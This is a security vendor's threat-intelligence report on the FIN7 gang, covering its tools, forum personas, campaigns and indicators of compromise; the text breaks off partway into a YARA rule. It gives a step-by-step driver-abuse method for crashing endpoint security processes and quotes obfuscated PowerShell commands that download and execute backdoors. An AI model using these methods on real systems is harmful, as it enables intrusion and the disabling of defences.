{
	"id": "ee94340d-8f26-457c-bfa8-ffa1e72ad4aa",
	"created_at": "2026-04-06T00:19:02.871546Z",
	"updated_at": "2026-04-10T03:35:52.914793Z",
	"deleted_at": null,
	"sha1_hash": "0434a411803905bad418971f437d75694530be03",
	"title": "FIN7 Reboot | Cybercrime Gang Enhances Ops with New EDR Bypasses and Automated Attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5143454,
	"plain_text": "FIN7 Reboot | Cybercrime Gang Enhances Ops with New EDR\r\nBypasses and Automated Attacks\r\nBy Antonio Cocomazzi\r\nPublished: 2024-07-17 · Archived: 2026-04-05 14:36:23 UTC\r\nExecutive Summary\r\nNew evidence shows FIN7 is using multiple pseudonyms to mask the group’s true identity and sustain its\r\ncriminal operations in the underground market\r\nFIN7’s campaigns demonstrate the group’s adoption of automated SQL injection attacks for exploiting\r\npublic-facing applications\r\nAvNeutralizer (aka AuKill), a highly specialized tool developed by FIN7 to tamper with security solutions,\r\nhas been marketed in the criminal underground and used by multiple ransomware groups\r\nSentinelLABS has discovered a new version of AvNeutralizer that utilizes a technique previously unseen in\r\nthe wild to tamper with security solutions, leveraging the Windows built-in driver ProcLaunchMon.sys\r\n(TTD Monitor Driver)\r\nAttribution efforts have expanded our understanding of the AvNeutralizer malware family. This research\r\noffers a broader perspective than previous research, enabling better evolution tracking and retrospective\r\nanalysis\r\nBackground\r\nFIN7, an elusive and persistent financially motivated threat group with origins in Russia, has been active since\r\n2012, targeting various industry sectors and causing substantial financial losses in industries such as hospitality,\r\nenergy, finance, high-tech and retail.\r\nInitially, FIN7 specialized in using POS (Point of Sale) malware for financial fraud. However, beginning in 2020,\r\nit shifted its focus to ransomware operations, affiliating with notorious RaaS groups such as REvil and Conti as\r\nwell as launching its own RaaS programs under the names Darkside and subsequently BlackMatter.\r\nThe group has created fraudulent infosec firms, such as Combi Security and Bastion Secure, to deceive security\r\nresearchers and launch ransomware attacks. 
Despite setbacks like the arrests of some members, FIN7’s activities have continued, suggesting changing TTPs, temporary breaks or the emergence of splinter groups.\r\nThis research explores the group’s activities, from underground operations to new TTPs and malicious campaigns, to help defenders better understand and counteract its operations.\r\nhttps://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\r\nCriminal Underground Operations\r\nIn our November 3rd, 2022 report, we discussed the connection between FIN7 and the use of EDR evasion tools in ransomware attacks involving the Black Basta group. Our telemetry revealed that the EDR impairment tool, which we track as “AvNeutralizer” (aka AuKill), targeted multiple endpoint security solutions and was used exclusively by the group for six months. This reinforced our hypothesis that FIN7 and Black Basta might have had a close relationship.\r\nNew evidence has emerged since our last report, allowing us to refine our understanding of the situation. Beginning in January 2023, we observed a peak in the usage of updated versions of AvNeutralizer by multiple ransomware groups. This suggests that the tool was no longer exclusive to Black Basta, which shifted several TTPs since our last report and removed AvNeutralizer from its arsenal. We hypothesize that AvNeutralizer was likely sold on criminal underground forums, with Black Basta being one of the early buyers and adopters.\r\nAfter conducting a thorough analysis, we identified multiple advertisements across various underground forums which we assess with high confidence were promoting the sale of the AvNeutralizer tool. On May 19th, 2022, a user named “goodsoft” advertised an AV killer tool for a starting price of $4,000 on the exploit[.]in forum, which targeted various endpoint security solutions. Later, on June 14th, 2022, a user named “lefroggy” published a similar advertisement on the xss[.]is forum for $15,000. A week later, on June 21st, a user named “killerAV” posted a similar advertisement on the RAMP forum for $8,000.\r\nAV killer advertisement by ‘goodsoft’, Google translated from RU\r\nWe have observed activity from “goodsoft”, “lefroggy” and “killerAV” on several criminal forums, revealing posts consistent with the interests, motivations and TTPs of FIN7.\r\nOn August 10th, 2022, “goodsoft” offered their “PentestSoftware” for sale at a monthly rate of $6,500 on the exploit[.]in forum. The advertisement described the software as a post-exploitation framework with multiple modules designed to infiltrate enterprise networks and evade conventional antivirus programs. The poster claimed that a development team had spent over three years and US $1 million creating the software.\r\nThe post provides a link to a PDF manual to demonstrate the software’s legitimacy. Our analysis of the manual shows that the “PentestSoftware” being advertised is referred to as “IceBot” and “Remote System Client” in the manual, exhibiting similarities in functionality to the Diceloader malware. Users “killerAV” and “lefroggy” posted similar advertisements for the “PentestSoftware” on the RAMP and xss[.]is forums shortly afterward.\r\nOn March 28th, 2023, a user named “Stupor” advertised an AV killer targeting various security solutions for a starting price of $10,000 on the xss[.]is forum. We collected and analyzed the tool, identifying it with high confidence as an updated version of AvNeutralizer and linking it to the same individual identified in our previous report.\r\nAV killer advertisement by ‘Stupor’, Google translated from RU\r\nConsidering the available evidence and prior intelligence, we assess with high confidence that “goodsoft”, “lefroggy”, “killerAV” and “Stupor” belong to the FIN7 cluster. Furthermore, these threat actors are likely employing multiple pseudonyms on various forums to mask their true identity and sustain their illicit operations within this network.\r\nFIN7 Arsenal\r\nThe proficiency of FIN7 in executing sophisticated cyberattacks relies on its versatile arsenal, which includes tools such as Powertrash, Diceloader, Core Impact, an SSH-based backdoor, and AvNeutralizer. Each of these tools supports a different attack phase during intrusions, allowing the group to infiltrate, exploit, persist and evade detection.\r\nPowertrash\r\nPowertrash, a heavily obfuscated PowerShell script, is designed to reflectively load an embedded PE file in memory, enabling the group to stealthily execute its backdoor payloads in its malicious campaigns. Powertrash has been deployed in FIN7 intrusions as a means to evade defenses.\r\nPowertrash snippet of code\r\nAlthough FIN7 isn’t the sole user of Powertrash, it is one of its main adopters. In order to gain a better understanding of its usage, we carried out a retrospective analysis of approximately 50 available samples to determine the malware families associated with Powertrash. To facilitate this process, we developed an unpacker based on the PowerShell Abstract Syntax Tree (AST) for effectively handling the highly obfuscated code and automating payload extraction. 
We’re making the Powertrash unpacker publicly available to encourage further research.\r\nTimeline of Powertrash-Packed Malware Families\r\nOur analysis of the timeline of Powertrash-packed malware families revealed a consistent pattern in the usage of the group’s C2 implants. Historically, FIN7 has utilized Carbanak, a privately developed and fully featured C2 framework, to carry out its malicious operations. In line with the timeline, Lizar version 2.0 (aka Diceloader) was discovered in Q1 2021 as an evolution of Carbanak and replaced it. Furthermore, the emergence of Powertrash samples delivering Core Impact implants starting in Q2 2022 correlates with “lefroggy” activities in the criminal underground, where that persona was purchasing cracked copies of Core Impact on the xss[.]is forum.\r\nDiceloader\r\nDiceloader, aka Lizar and IceBot, is a minimal backdoor that enables the attacker to establish a C2 channel. This backdoor allows the attacker to control the system by sending position-independent code (or shellcode) modules, loading them directly in memory and sending the output back to the attacker through an encrypted channel.\r\nThe payloads contain an encrypted configuration that instructs the bot on which C2 server and port to connect to for control. The payload is not designed to be dropped directly on disk and is compiled with the ReflectiveLoader implementation to allow in-memory reflective loading. Diceloader has typically been deployed through Powertrash loaders in FIN7 operations.\r\nThe attacker uses a helper UI client, also referred to as the “Remote System Client”, to interact with the Diceloader C2 servers and control its victims. This UI client can be used by the operator to load additional modules on multiple victims and progress their attacks within the compromised environments.\r\nRemote System Client UI to interact with Diceloader (image by Prodaft)\r\nThe Diceloader C2 server implementation does not hide its specific implementation details, and it produces a unique network signature that can be easily fingerprinted. At the time of this research, we were able to track the active Diceloader C2 infrastructure, which was distributed across various countries and hosting providers.\r\nSSH-based Backdoor\r\nDuring our investigation into the Diceloader C2 infrastructure, we identified a Diceloader C2 server, attributed with high confidence to FIN7, which exposed an open directory web server used as a staging server to serve their payloads.\r\nFIN7 open directory web server\r\nOn this server, we found two Powertrash loaders delivering Diceloader and another directory containing native tools based on OpenSSH and 7zip. These tools appeared to be used as a persistence tactic by the group. They are chained to maintain persistence on the compromised system by downloading the entire toolchain from the staging server and executing the install.bat script.\r\nSSH-based backdoor “install.bat” snippet of code\r\nThis script initializes all necessary dependencies and sets up an SFTP server through a reverse SSH tunnel connecting to the attacker’s server using the embedded private key provided in the toolchain. The reverse tunnel is configured as a scheduled task so it can survive reboots. With this setup, the attacker can stealthily exfiltrate files from the compromised machine at any time.\r\nWe have observed this tool being used exclusively in intrusions directly operated by FIN7, typically when the group aimed to gather sensitive information from the targeted company.\r\nCore Impact\r\nCore Impact is a penetration testing tool designed for exploitation activities. It offers an extensive library of commercial-grade exploits, aligning well with FIN7’s interests observed in the criminal underground.\r\nThe framework enables the generation of Position Independent Code (PIC) implants to take control of exploited systems. These implants come packed with PIC loaders, which use XOR decryption at runtime to evade static detections. The implant configuration includes the C2 server’s IP and port for receiving commands from the attacker, along with an RSA public key for use in the encrypted communication channel.\r\nFIN7 has been delivering Core Impact loaders through Powertrash in their campaigns. To facilitate the analysis of Core Impact implant configurations, we have developed an unpacker that automatically extracts the Core Impact implant from the observed loaders in the wild. The Core Impact unpacker is released as part of this research to encourage further investigation.\r\nSince the RSA public key is initialized when the Core Impact C2 server is started, loaders that share a key point to the same server instance, and we have found loaders with such overlapping configurations. 
We attribute, with medium confidence, one specific RSA key to FIN7 operations:\r\ncd19dbaa04ea4b61ace6f8cdfe72dc99a6f807bcda39ceab2fefd1771d44ad288b76bc20eaf9ee26c9a175bb055f0f2eb800ae6010ddd7b509e061651ab5e883d491244f8c04cbc645717043c74722bee317754ea1df13e446ca9b1728f1389785daecf915ce27f6806c7bfa2b5764e88e2957d2e9fcfd79597b3421ea4b5e6f\r\nAvNeutralizer\r\nAccording to our intel, FIN7 began developing a specialized tool to tamper with security solutions in April 2022. We track this tool as “AvNeutralizer” (aka AuKill). The tool has received multiple updates, with a recent iteration including a previously unseen tampering method.\r\nThe first usage of this tool in intrusions detected within our telemetry was observed in early June 2022. The tool is delivered to buyers as a customized build targeting the specific security solutions requested by the buyer. While multiple samples of the tool exhibit the same code, the list of targeted process names may vary based on the attacker’s chosen build.\r\nThe earliest version of AvNeutralizer we identified and reported (2fc8b38d3f40d8151ec717c8a8813cf06df90c10) was detected in human-operated intrusions carried out by the Black Basta group, which deployed ransomware to extort victims. This version of the tool exploited weaker versions (\u003c 17.0) of the Process Explorer driver, which allowed cross-process operations between admin processes and protected processes directly from the kernel. The tool used this weakness to tamper with security solutions installed on the system.\r\nThe userland component was delivered by the attackers during their intrusions using names that mimic the targeted security solutions. We observed file names for the userland component such as AVDieSe.exe, AVDieSophos.exe, AVDieMS.exe and AVDiePanda.exe.\r\nSubsequent updates of AvNeutralizer, detected in our telemetry starting from early 2023, included minor changes such as a naming convention usually prefixed with “au” followed by the targeted security solution name (e.g., auSentinel.exe, auSophos.exe, auElastic.exe, auSyma.exe) and the use of the startkey command-line parameter. Starting from this version, we observed a significant overlap between what we internally track as AvNeutralizer and the “AuKill” tool documented by Sophos.\r\nSince early 2023, our telemetry data reveals numerous intrusions involving various versions of AvNeutralizer. About 10 of these are attributed to human-operated ransomware intrusions that deployed well-known RaaS payloads including AvosLocker, MedusaLocker, BlackCat, Trigona and LockBit.\r\nPrevious research has reported on connections between FIN7 and RaaS groups like LockBit. While we cannot conclusively determine whether intrusions involving the LockBit locker and the AvNeutralizer tool were executed by FIN7, we have not found evidence directly linking these activities to the group.\r\nSince Sophos has already provided a detailed analysis of an earlier version of the tool, we will document the updated version of AvNeutralizer (15186e9d03600c667bbe4b34c5e1348bfc0a8168), which now implements previously unseen techniques to tamper with some specific implementations of protected processes.\r\nThis updated version has been used in ransomware intrusions starting from April 2023, either as a packed or unprotected payload. Despite different threat actors using the tool, the packer code is identical across the various usages, suggesting that FIN7 provides a shared obfuscator to its buyers within the AvNeutralizer bundle.\r\nThe packer employs anti-analysis techniques, such as checking the “startkey” command-line argument and using Win32 functions like IsDebuggerPresent and SetUnhandledExceptionFilter to detect execution under a debugger. The final PE payload is unpacked with two iterations of XOR decryption, separated by a step of LZNT1 decompression.\r\nThe malware uses the ExceptionInfo parameter of the UnhandledExceptionFilter routine (used as the unpacking function) to retrieve the ContextRecord and the values of the debug registers Dr0, Dr1, Dr2, Dr3 and Dr6. These values, which are 0 in non-debugged executions, are used as array indexes during the decryption routines. When a debugger has set hardware breakpoints or is single-stepping, the registers hold breakpoint addresses and status bits instead of zeros, so the routine reads the wrong array slots and silently produces garbage rather than a PE, which complicates analysis.\r\nFirst iteration of XOR decryption in the unpacking function\r\nSecond iteration of XOR decryption in the unpacking function\r\nNew Technique to Disable Endpoint Security Solutions\r\nThe unpacked AvNeutralizer payload (8a03580d29fe1dcc3de9fffaf8960bc339ecd994) employs more than 10 different user mode and kernel mode techniques to tamper with the security solutions installed on the system. Most of these techniques are already documented, such as removing PPL protection through the vulnerable RTCore64.sys driver, sandboxing protected processes, leveraging the Restart Manager API and the Service Control Manager API, and more.\r\nHowever, we discovered a further unique technique that leverages a Windows built-in driver capability previously unseen in the wild.\r\nAvNeutralizer uses a combination of drivers and operations to create a failure in some specific implementations of protected processes, ultimately leading to a denial of service condition. It employs the TTD monitor driver ProcLaunchMon.sys, available on default system installations in the system drivers directory, in conjunction with an updated version of the Process Explorer driver, version 17.02 (17d9200843fe0eb224644a61f0d1982fac54d844), which has been hardened against cross-process operation abuse and is currently not blocked by Microsoft’s WDAC driver blocklist.\r\nThe steps we observed to be successful in achieving a DoS condition in some protected process implementations are as follows:\r\n1. Drops the Process Explorer driver to C:\\Windows\\System32\\PED.sys (17d9200843fe0eb224644a61f0d1982fac54d844), loads it and connects to the driver device \\\\.\\PROCEXP152;\r\n2. Loads the driver C:\\Windows\\System32\\drivers\\ProcLaunchMon.sys available on the local system and connects to the driver device \\\\.\\com_microsoft_idna_ProcLaunchMon;\r\n3. Configures a new TTD monitoring session by interacting with the ProcLaunchMon driver;\r\n4. Adds the PID of the targeted protected process to the TTD monitoring session, causing newly spawned child processes to be suspended (IOCTL: 0x228034);\r\n5. Uses the procexp driver to kill all non-protected child processes of the targeted protected process; this is still allowed in updated versions of the Process Explorer driver;\r\n6. The protected process tries to relaunch its child processes, but this time they are suspended by the kernel;\r\n7. The protected process is unable to communicate with its child processes and experiences failures due to this condition, ultimately leading to a crash.\r\nAvNeutralizer Workflow\r\nMalicious Campaigns\r\nProdaft’s prior research has highlighted the Checkmarks platform, developed by the FIN7 group as an automated attack 
system primarily aimed at exploiting public-facing Microsoft Exchange servers. The platform conducts extensive scanning and exploitation by leveraging the ProxyShell exploit, which takes advantage of the CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 vulnerabilities.\r\nThe Checkmarks platform also incorporates an Auto-SQLi module for SQL injection attacks. If initial attempts are unsuccessful, the SQLMap tool scans targets for potential SQL injection vulnerabilities. This module provides remote access to the victim’s system, with FIN7 tailoring the system for seamless implementation and adaptability to various situations, thereby expanding the range of exploitable vulnerabilities.\r\nOur findings indicate numerous intrusions leveraging SQL injection vulnerabilities targeting public-facing servers through automated exploitation, which we attribute with medium confidence to FIN7 and the Auto-SQLi module within the Checkmarks system. These intrusions primarily occurred in 2022, with a particular focus during Q3, impacting US companies in the manufacturing, legal and public sector industries.\r\nExecution chain delivering Core Impact implant (as seen by SentinelOne Singularity)\r\nExecution chain delivering Diceloader (as seen by SentinelOne Singularity)\r\nObserved exploitation activities involve PowerShell droppers with multiple layers of obfuscation, ultimately leading to the final URL that downloads and executes the implant.\r\nPowershell droppers obfuscation layers\r\nThe PowerShell droppers employed in these campaigns deliver Powertrash loaders from staging servers, such as hxxp://193.178.210[.]227/work_53.bin_m7.ps1 and hxxp://45.87.154[.]208/icsnd3b_64refl.ps1. These Powertrash loaders allow the group to gain control over compromised victim systems by loading a backdoor payload. Specifically, we observed Powertrash loaders named with the “work” prefix loading Core Impact implants connecting to the C2 server 37[.]157[.]254[.]8, while those with the “icsnd” prefix loaded Diceloader connecting to the C2 server 194[.]180[.]174[.]86.\r\nIn one specific intrusion, the group installed persistence on the exploited system using the SSH-based backdoor through a batch script named install.bat. We suspect that, given the nature of the targeted company, the group’s intention was to establish covert and persistent access for future espionage operations.\r\nConclusion\r\nOur investigation into FIN7’s activities highlights its adaptability, persistence and ongoing evolution as a threat group. In its campaigns, FIN7 has adopted automated attack methods, targeting public-facing servers through automated SQL injection attacks. Additionally, its development and commercialization of specialized tools like AvNeutralizer within criminal underground forums significantly enhance the group’s impact.\r\nFIN7’s continuous innovation, particularly in its sophisticated techniques for evading security measures, showcases its technical expertise. The group’s use of multiple pseudonyms and collaboration with other cybercriminal entities makes attribution more challenging and demonstrates its advanced operational strategies. We hope this research will inspire further efforts to understand and mitigate FIN7’s evolving tactics.\r\nIndicators of Compromise\r\nSHA1 Notes\r\n05e9e0005fd38a0f168757637c1719d6303bfbac FIN7 Powertrash\r\n343f15cd30791d8d9809ac471bcd39eee0ae09e2 FIN7 Powertrash\r\n671e195ad9c38bbb4985b8643f4de091c47cdde7 FIN7 Powertrash\r\n83082e3843b132e0374f242da42138b35d964759 FIN7 Powertrash\r\n86533fff7813bc140c89bd2ed09b8484afe7e4ac FIN7 Powertrash\r\n8f564864ac8d2b698367da377a32b6ecd2272631 FIN7 Powertrash\r\ncb0da51272207aa98f44d51e79c17033f406cd6a FIN7 Powertrash\r\nfdc5636503862b3cdaa93a48332a4b7c782e2bdf FIN7 Powertrash\r\n0b4974c0d0802f6b8befae8d89abba4593756dfa FIN7 Core Impact implant PIC\r\n1693ec86bb6de6e0fe64f57484e1ce97bf373081 FIN7 Core Impact loader PIC\r\n278b1ee17b057051179bb6302b099cdef3240c84 FIN7 Core Impact implant PIC\r\n52e261a7cab837489dfcb8cd49aaf82ee287968c FIN7 Core Impact loader PIC\r\n7796f28213916157245b248566fa2a1d4811e66e FIN7 Core Impact loader PIC\r\n8857ba79fdefb97ac443a1f3d74b372d19db36a8 FIN7 Core Impact implant PIC\r\nadb6c5607a28f6d60756116c7de91299a1137c83 FIN7 Core Impact loader PIC\r\nf073749b1358017bf0a28f65693765ef6fd0157d FIN7 Core Impact implant 
PIC\r\n0aeab70affcab0f1e96c62c25dd41dc32d41e2ea FIN7 Diceloader\r\n19f71c7b000f43d6bcbe11234a0e586742b311d1 FIN7 Diceloader\r\n9a6ca844409c6ba2db25a068de40ccad9c952f3a FIN7 Diceloader\r\n0e8fe5b9ff59102b42805342897dff1a8f1ae003 FIN7 SSH-based backdoor\r\n425222ce8b1c6d6d4eacccb7da64ce6d6a6291ca FIN7 SSH-based backdoor component\r\n84f1fd6d0a9ff98c23287c02887811899af4adb7 FIN7 SSH-based backdoor\r\n043f17d7a0f80ed8383ee251b8071c8c46a625eb Powertrash\r\n1300b157a1ee8f5ecde665a1aa1524facfed31c4 Powertrash\r\n1345492b027142c803990ea77aea08dd57b6f304 Powertrash\r\n19ca1aff37c058971c0880516e00654d1e3d27a1 Powertrash\r\n307033dbf90d21522ee6b031856b3faee249ced9 Powertrash\r\n32f3e4f9dfeebc4cf078db7b885151d8936504a6 Powertrash\r\n3c3773421709113acf9918cb2dbdd08dd46497c7 Powertrash\r\n3ea2921a3619eaf9a95eb023a22215005924e8bb Powertrash\r\n3ee8b071c9b844ab643db1a5ca048b482d1adbd3 Powertrash\r\n3f5797defcb57d7dde6eb1d2acf05947b4444260 Powertrash\r\n4625c52e734a51efd431b5ac78c3912eca4cd996 Powertrash\r\n5a6c1f0942ceb25e5d3a5f5e777c812c52bf48fc Powertrash\r\n6984f06e6485e33f84c0f58fa253509f9a2d46fe Powertrash\r\n7908811e3c071a5b828ee48083fef2eee146f4b9 Powertrash\r\n8687b6b1508a93556d6e30d14e5c4ee9971f2d80 Powertrash\r\n88cd32ace737d6dfeb4ffdc299db5a444d113e10 Powertrash\r\n8ba2faee8cacf4ca2ae5b83a2c1c78919dc902b8 Powertrash\r\n8ba9ffa31a1403d436df062d5cebee1d20f9b49a Powertrash\r\n8bf65dbb08bb5c44f869bcc78d4314ccbc1e8d32 Powertrash\r\n91226772402917f7fbfa203e39c9c5af3494b00b Powertrash\r\n95eab0e745e260daaf7022b0c64d25589ead7348 Powertrash\r\n9707e4e4a17039b9401b90bb6f14fa67b7c53415 Powertrash\r\n9abaa7b590c4fb902834ab16df5fb733eab50721 Powertrash\r\n9d28dec1c9882d72f9a74e3fc4e7bc1804d28a2d Powertrash\r\na3be8b29d46db190d51b2e8a67d127175164227c Powertrash\r\nb21914a068965cb7e715848dedf9399c038da5c2 Powertrash\r\nc7dcbfe93a4de0012a261cfc4abdfddb7770ca98 Powertrash\r\nc833e24b5f698103121bd67f05f81f1d633cbbb0 Powertrash\r\nc9a705395fab442261c174021caa9348ebff6b19 Powertrash\r\ncd1a40c5d624826429b6f403324abc221167704c Powertrash\r\ndbcdbdf927e351d371606e861cee41bbd2be1d33 Powertrash\r\ne292ba2cd4fe3afa2d21c4ced23e15df13395bd1 Powertrash\r\ne4074c75993960298838b44855665553709d89dd Powertrash\r\nfe9f23bbeb9737b066675a55aa5b66171c804c37 Powertrash\r\n3ce8f2ac69e43f556cedd34b8c792e032eb4ee19 Core Impact loader PIC\r\n58fad3ef8a4f44e973d1609bfd7caf756de98424 Core Impact implant PIC\r\n8a3ee88e7b64aade814745d76906461a063883ff Core Impact implant PIC\r\nb5a53f2762b7d7c09ecebe1e0838828d7f42f2bd Core Impact loader PIC\r\n16c8dde4565958589cd81af33c9f09817216eda0 Diceloader\r\n23924e8ebd19be1f05ffed774ec5481503cf4cd5 Diceloader\r\n297e1f284a758847df8596b04a1c7f17241e9072 Diceloader\r\n311eaa735f4ae0b34e5943f150db0e796173846c Diceloader\r\n3f07408a0beb184b30fb6affdf2c57ccc6f99e4d Diceloader\r\n47cf95118d0ec3a50aeb09677f378cac508052a4 Diceloader\r\n617627f0dd70011773dd16c6a15a2de2942d34dd Diceloader\r\n6772e23cfbf42a4aef63bdf7c8844fe61208b628 Diceloader\r\n67ca301c74d2c9e294eedf790f40a9d358dee0f3 Diceloader\r\n6dfac9c62f35a527a86904b49fe97a0eb9c912be Diceloader\r\n6fa8b56e1f6067007503e5df351e2e75386ac072 Diceloader\r\n79d9724d37bfda0bd8cd26ecf50ed07c9d18dd64 Diceloader\r\n7f66fda7b3616ff31739e174b6f177d9eee77584 Diceloader\r\nc5c1ec58b09ca672d491892469bee92d1e061065 Diceloader\r\ndf753441c24c5aef920f9f772f81c43c88e595ee Diceloader\r\ne4954f51c545ba7af4e8c670380cfe03b25490e7 Diceloader\r\n45e8cebbd795d02e082fca25515bbf181f851a3c Carbanak\r\n4e32f3df7d27c991c0e361670879a266298747a6 Carbanak\r\nacc1c19abf7a649b871a0ec4776271b66b8893fb Carbanak\r\nad6bc38913f98c3f4b57d5415ef6e4d3ee35234a Carbanak\r\ndc4f836a7e5658a649a7eeb30107a4ac7fac9e31 Carbanak\r\n24786e5000670ac8b51a7292d3d384f39c466880 Minodo Backdoor\r\ncc37284c6a387b474d2c714496abcbe415ed74eb Cobaltstrike beacon\r\n936447d6a1f69f2b4aaba158504c7b5a09ab6385 Mimikatz Powerkatz dll\r\n15186e9d03600c667bbe4b34c5e1348bfc0a8168 AvNeutralizer packed version\r\ncc17f8dd1ed74955a9c4d8b5a766ef6a2fa6807d AvNeutralizer packed version\r\n07d0c0c315f99c4f1785645ddd4c3fe665c0448c AvNeutralizer\r\n187546da3f90d17329dd999ea481c3ebe3f99845 AvNeutralizer\r\n1c8c903ff1b704236cd061c0b9edcf0a25e5e371 AvNeutralizer\r\n2fc8b38d3f40d8151ec717c8a8813cf06df90c10 AvNeutralizer\r\n323e033566d06a2b5e2873fbc2f846d2c768f2e9 AvNeutralizer\r\n39d01edefd751a59e17319e81362bca911e80fba AvNeutralizer\r\n6b406be948fff3a6510345048343abd570fc7fb9 AvNeutralizer\r\n8a03580d29fe1dcc3de9fffaf8960bc339ecd994 AvNeutralizer\r\na672c2c05e72b1d9d61e5977ec5e436bfac9c9b7 AvNeutralizer\r\nc73cd7c4475a03cbd88942a37ef437487d99e21c AvNeutralizer\r\nf7b0369169dff3f10e974b9a10ec15f7a81dec54 AvNeutralizer\r\nf9aad333dc17763dfcf33ec13e560a6b89c5d335 AvNeutralizer\r\nff11360f6ad22ba2629489ac286b6fdf4190846e AvNeutralizer\r\nIP Address Notes\r\n193[.]178[.]210[.]227 FIN7 staging server IP\r\n45[.]87[.]154[.]208 FIN7 staging server IP\r\n37[.]157[.]254[.]8 FIN7 Core Impact C2 IP\r\n213[.]109[.]192[.]198 FIN7 Core Impact C2 IP\r\n213[.]109[.]192[.]116 FIN7 Core Impact C2 IP\r\n104[.]193[.]255[.]99 FIN7 Core Impact C2 IP\r\n194[.]180[.]174[.]86 FIN7 Core Impact/Diceloader C2 IP\r\n91[.]199[.]147[.]152 FIN7 Diceloader C2 IP\r\n193[.]109[.]120[.]69 FIN7 Diceloader C2 IP\r\n194[.]180[.]191[.]85 FIN7 Diceloader C2 IP\r\n185[.]117[.]88[.]245 FIN7 SSH-based backdoor C2 IP\r\n80[.]71[.]157[.]173 FIN7 SSH-based backdoor C2 IP\r\n15[.]235[.]156[.]105 FIN7 SSH-based backdoor C2 IP\r\n185[.]117[.]119[.]108 FIN7 SSH-based backdoor C2 IP\r\n185[.]234[.]247[.]62 FIN7 SSH-based backdoor C2 IP\r\n194[.]104[.]136[.]113 FIN7 SSH-based backdoor C2 IP\r\n185[.]232[.]170[.]83 FIN7 SSH-based backdoor C2 IP\r\n91[.]149[.]243[.]129 Core Impact C2 IP\r\n194[.]87[.]82[.]7 Diceloader C2 IP\r\n195[.]123[.]246[.]20 Diceloader C2 IP\r\n217[.]12[.]206[.]176 Diceloader C2 IP\r\n45[.]136[.]199[.]128 Diceloader C2 IP\r\n45[.]66[.]249[.]75 Diceloader C2 IP\r\n94[.]158[.]244[.]107 Diceloader C2 IP\r\n5[.]252[.]177[.]7 Diceloader C2 IP\r\n94[.]158[.]244[.]23 Diceloader C2 IP\r\n193[.]42[.]36[.]231 Diceloader C2 IP\r\n94[.]140[.]114[.]173 Diceloader C2 IP\r\n185[.]232[.]170[.]205 Diceloader C2 IP\r\n185[.]250[.]151[.]60 Diceloader C2 IP\r\n207[.]246[.]92[.]213 Diceloader C2 IP\r\n162[.]248[.]225[.]148 Diceloader C2 IP\r\n185[.]172[.]129[.]70 Diceloader C2 IP\r\n46[.]17[.]107[.]7 Diceloader C2 IP\r\n185[.]250[.]151[.]33 Diceloader C2 IP\r\n46[.]17[.]107[.]32 Diceloader C2 IP\r\n185[.]250[.]151[.]141 Diceloader C2 IP\r\n91[.]193[.]19[.]163 Diceloader C2 IP\r\n208[.]88[.]226[.]158 Diceloader C2 IP\r\n108[.]170[.]20[.]89 Diceloader C2 IP\r\n195[.]123[.]240[.]46 Diceloader C2 IP\r\n185[.]16[.]40[.]108 Diceloader C2 IP\r\n95[.]123[.]243[.]169 Diceloader C2 IP\r\n184[.]95[.]51[.]185 Diceloader C2 IP\r\n198[.]15[.]119[.]69 Diceloader C2 IP\r\n37[.]1[.]210[.]119 Diceloader C2 IP\r\n185[.]33[.]87[.]24 Diceloader C2 IP\r\n192[.]248[.]188[.]166 Diceloader C2 IP\r\n185[.]244[.]151[.]114 Diceloader C2 IP\r\n194[.]87[.]191[.]198 Diceloader C2 IP\r\n85[.]239[.]54[.]214 Diceloader C2 IP\r\n185[.]161[.]210[.]11 Diceloader C2 IP\r\n95[.]216[.]251[.]213 Diceloader C2 IP\r\n95[.]217[.]102[.]49 Diceloader C2 IP\r\n62[.]233[.]57[.]163 Diceloader C2 IP\r\n193[.]233[.]22[.]68 Diceloader C2 IP\r\n146[.]59[.]217[.]154 Diceloader C2 IP\r\n193[.]233[.]23[.]158 Diceloader C2 IP\r\n91[.]199[.]147[.]60 Diceloader C2 IP\r\n62[.]233[.]57[.]31 Diceloader C2 IP\r\n95[.]217[.]82[.]121 Diceloader C2 IP\r\n45[.]82[.]13[.]64 Diceloader C2 IP\r\n91[.]149[.]253[.]184 Diceloader C2 IP\r\n193[.]233[.]23[.]59 Diceloader C2 IP\r\n65[.]108[.]20[.]101 Diceloader C2 IP\r\n62[.]233[.]57[.]241 Diceloader C2 IP\r\n65[.]108[.]20[.]165 Diceloader C2 IP\r\n79[.]141[.]162[.]131 Diceloader C2 IP\r\n62[.]233[.]57[.]19 Diceloader C2 IP\r\n185[.]161[.]208[.]45 Diceloader C2 IP\r\n176[.]97[.]75[.]244 Diceloader C2 IP\r\n195[.]123[.]246[.]46 Diceloader C2 IP\r\n91[.]149[.]221[.]195 Diceloader C2 IP\r\n193[.]233[.]23[.]45 Diceloader C2 IP\r\n195[.]123[.]218[.]99 Cobaltstrike C2 IP\r\n5[.]161[.]41[.]51 Minodo Backdoor C2 IP\r\nURL Notes\r\nhxxp://193.178.210[.]227/work_53.bin_m7.ps1 FIN7 URL delivering Core Impact implant packed with Powertrash\r\nhxxp://45.87.154[.]208/work_53m8.ps1 FIN7 URL delivering Core Impact implant packed with Powertrash\r\nhxxp://45.87.154[.]208/icsnd3b_64refl.ps1 FIN7 URL delivering Diceloader packed with Powertrash\r\nFIN7 command lines to download and execute backdoor payloads\r\npowershell.exe -ep bypass -w Hidden -noni -c \"[char[]]'%q\u003e))Ofx.Pckfdu!Ofu/XfcDmjfou*/EpxompbeTusjoh)(i(,(u(,(u(,(q(,(;(,(0(,(0(,(2(,(:(,(4(,(/(,\r\npowershell.exe -ep bypass -w Hidden -noni -Enc \"WwBjAGgAYQByAFsAXQBdACcAJQBkAG8AdQAhAD4AIQAxADwAIQBlAHAAIQB8ACEAJQBkAG8AdQAsACwAPAAhAHUAcwB6ACEAfAAh\r\nYARA Hunting Rules\r\nrule PS1_Powertrash {\r\n    meta:\r\n        author = \"Antonio Cocomazzi @ SentinelOne\"\r\n        description = \"Detects Powertrash: an obfuscated powershell in-memory loader\"\r\n        date = \"2023-04-17\"\r\n        reference1 = \"https://s1.ai/FIN7-u\"\r\n        reference2 = \"https://www.mandiant.com/resources/evolution-of-fin7\"\r\n        reference3 = \"https://blog.morphisec.com/vmware-identity-manager-attack-backdoor\"\r\n        hash = \"86533fff7813bc140c89bd2ed09b8484afe7e4ac\"\r\n    